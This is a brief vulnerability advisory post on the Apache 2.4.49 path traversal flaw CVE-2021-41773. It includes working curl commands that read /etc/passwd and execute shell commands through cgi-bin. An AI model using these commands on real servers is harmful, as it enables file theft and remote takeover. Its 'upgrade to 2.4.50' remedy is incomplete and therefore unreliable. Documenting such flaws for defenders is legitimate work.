Listen to this Post
The CVE-2021-41773 vulnerability exists in Apache HTTP Server versions 2.4.49. A flaw in the path normalization algorithm allows an attacker to bypass security constraints. Specifically, the function that converts a URL into a filesystem path does not adequately sanitize input containing path traversal sequences (e.g., ../). If the `require all denied` directive is not set, a maliciously crafted request can map URLs to files outside of the document root. For example, a request like `GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1` could escape the web root. Furthermore, if mod_cgi is enabled and a CGI script is accessible, this path traversal can be leveraged for remote code execution by sending unexpected HTTP headers, turning a directory traversal into a command injection vulnerability.
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability : Path Traversal
Severity: Critical
date: 2021-10-05
Prediction: 2021-10-07
What Undercode Say:
Check server version httpd -v Curl request to test for path traversal curl -s "http://target:80/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd" Example exploit for RCE if mod_cgi is enabled curl -s -X POST "http://target:80/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" -d "echo; id"
How Exploit:
An attacker sends a crafted HTTP request with URL-encoded path traversal sequences (.%2e/ or %%32%65) to access files outside the web root. If mod_cgi is active, they can execute system commands by targeting a CGI script.
Protection from this CVE:
Upgrade to version 2.4.50. Implement strict configuration rules using `require all denied` for directories. Sanitize all user-supplied input.
Impact:
Unauthorized file disclosure. Potential remote code execution. Complete system compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
